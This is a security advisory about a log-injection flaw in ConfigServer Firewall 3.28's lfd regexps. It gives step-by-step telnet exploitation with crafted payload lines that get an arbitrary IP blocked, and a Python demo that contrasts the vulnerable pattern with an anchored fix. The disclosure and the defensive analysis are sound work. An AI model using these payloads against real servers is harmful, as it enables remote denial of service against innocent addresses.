CSF 3.28 - remotely block any IP address (Apache 1.x and Apache 2.x regexps)



DESCRIPTION


ConfigServer Firewall 3.28 provides the option to block brute force login attempts on various services. The regexps in csf/regexp.pm for modsec v1 and modsec v2 allowed any remote, unauthenticated person to block any IP address of their choice, because they were not anchored to the part of the Apache error_log line that httpd itself writes. The code looked similar to the following:

    # lfd (csf/regexp.pm): the pattern is not anchored, so the captured address
    # is whatever "[client A.B.C.D]" token happens to precede "user ... not found:"
    # anywhere in the line, including inside text supplied by the remote peer.
    if ( $log_line =~ /\[client (\d+\.\d+\.\d+\.\d+)\] user .* not found:/ ) {
        return ( 'Unsuccessful http auth from', $1, 'htpasswd');
    }



IMPACT


Remote, unauthenticated persons could block any IP address of their choice: lfd reads the attacker-chosen address out of the injected log line and hands it to iptables, so this is a remote denial of service against any address the attacker names.


The following steps can be used to take advantage of this issue. Repeat them five times:

1. telnet <victim server> 80

2. Type the following line, then press Enter twice to end the request:
[client 1.2.3.4] user not found:


This also worked via the Apache v1 regexp; in step 2 above, send the following line instead:

[client 1.2.3.4] user : authentication failure


This is what the httpd error_log normally looks like when someone attempts to log in with an unknown user ("alice" in this example):

[Wed Sep 09 02:15:22 2009] [error] [client 1.1.1.1] user alice not found: /

and this is what the log looks like after the request from step 2 is sent. Apache rejects the line as a malformed request and logs it verbatim, with its own "[client 1.1.1.1]" token (the attacker's real address) followed by the attacker-supplied text:

[Wed Sep 09 02:23:10 2009] [error] [client 1.1.1.1] Invalid URI in request [client 1.2.3.4] user not found:


Because the regexp is not anchored, it skips the genuine "[client 1.1.1.1]" token (which is followed by "Invalid URI", not "user") and matches the attacker-supplied "[client 1.2.3.4] user ... not found:" instead, so $1 is 1.2.3.4. The result is that lfd calls iptables to block 1.2.3.4 rather than the attacker.
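The matching failure described above, reproduced in Python as an added example (this is not csf's code): the advisory's Perl regexp is transcribed to Python's re module and run over two constructed log lines modelled on the excerpts above, next to an anchored variant suggested here as a fix. The dummy username in the payload, the error_log prefix used as the anchor and the hardened pattern itself are assumptions for illustration, not something the advisory states.

```python
import re

# Vulnerable pattern, transcribed from the advisory's Perl snippet into Python
# re syntax (identical semantics for this pattern). It is unanchored, so
# re.search() accepts the leftmost "[client A.B.C.D] user ... not found:" found
# ANYWHERE in the line, including inside text that the remote peer supplied.
VULNERABLE_RE = re.compile(r"\[client (\d+\.\d+\.\d+\.\d+)\] user .* not found:")

# Hardened variant (suggested here, not csf's actual fix): anchor on the fixed
# prefix that httpd itself writes for an Apache 1.3/2.2-style error_log line
# (assumed from the advisory's sample lines), so the only "[client ...]" token
# that can be captured is the one httpd emitted, and require the htpasswd
# message to follow it directly.
HARDENED_RE = re.compile(
    r"^\[\w{3} \w{3} \d{2} \d{2}:\d{2}:\d{2} \d{4}\] \[error\] "
    r"\[client (\d+\.\d+\.\d+\.\d+)\] user \S+ not found:"
)


def build_payload(target_ip):
    """Request line an attacker types over telnet (step 2 of the advisory).

    The pattern as printed needs at least one token between "user" and "not",
    so this constructed payload carries a dummy username ("x").
    """
    return f"[client {target_ip}] user x not found:"


def apache_invalid_uri_line(real_client_ip, request_line,
                            stamp="Wed Sep 09 02:23:10 2009"):
    """Mimic the error_log entry httpd writes when it rejects a malformed
    request line: its own [client] token, then the offending line verbatim.
    Constructed to match the shape of the advisory's second log excerpt."""
    return (f"[{stamp}] [error] [client {real_client_ip}] "
            f"Invalid URI in request {request_line}")


def ip_to_block(pattern, log_line):
    """Return the address lfd would hand to iptables for this line, or None."""
    m = pattern.search(log_line)
    return m.group(1) if m else None


# Constructed samples: a genuine failed htpasswd login, and the line produced
# when an attacker at 1.1.1.1 sends a payload naming the victim 1.2.3.4.
GENUINE = "[Wed Sep 09 02:15:22 2009] [error] [client 1.1.1.1] user alice not found: /"
INJECTED = apache_invalid_uri_line("1.1.1.1", build_payload("1.2.3.4"))


def evaluate():
    """Run both patterns over both lines; keys are "<pattern>_<line>"."""
    return {
        "vulnerable_genuine": ip_to_block(VULNERABLE_RE, GENUINE),
        "vulnerable_injected": ip_to_block(VULNERABLE_RE, INJECTED),
        "hardened_genuine": ip_to_block(HARDENED_RE, GENUINE),
        "hardened_injected": ip_to_block(HARDENED_RE, INJECTED),
    }


if __name__ == "__main__":
    for name, ip in evaluate().items():
        print(f"{name:20s} -> {ip}")
```

The vulnerable pattern extracts 1.2.3.4 from the injected line while the anchored one ignores it and still handles the genuine failure. The general lesson for any lfd- or fail2ban-style regexp that derives an address to block from a log line: match on the fields the logging daemon writes, never on a token that may sit inside bytes the remote peer controls, and check the anchor against the exact error_log format the server in question produces.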